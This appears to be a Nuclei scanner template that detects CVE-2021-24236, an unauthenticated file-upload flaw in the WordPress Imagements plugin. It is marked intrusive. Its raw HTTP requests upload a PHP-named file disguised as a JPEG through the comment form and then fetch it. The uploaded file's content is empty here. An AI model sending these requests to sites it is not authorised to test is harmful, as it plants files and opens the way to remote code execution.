id: "CVE-2021-24236" info: name: WordPress Imagements <=1.2.5 - Arbitrary File Upload author: pussycat0x severity: critical description: | WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code. reference: - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea - https://wordpress.org/plugins/imagements/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236 - https://nvd.nist.gov/vuln/detail/CVE-2021-24236 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: "CVE-2021-24236" cwe-id: CWE-434 epss-score: 0.11054 cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 framework: wordpress vendor: imagements_project product: imagements tags: cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive variables: php: "{{to_lower('{{randstr}}')}}.php" post: "1" http: - raw: - | POST /wp-comments-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="comment" {{randstr}} ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="author" {{randstr}} ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="email" {{randstr}}@email.com ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="url" ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="checkbox" yes ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="naam" {{randstr}} ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="image"; filename="{{php}}" Content-Type: image/jpeg ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="submit" Post Comment ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="comment_post_ID" {{post}} ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="comment_parent" 0 ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU-- - | GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: word part: body_2 words: - "CVE-2021-24236"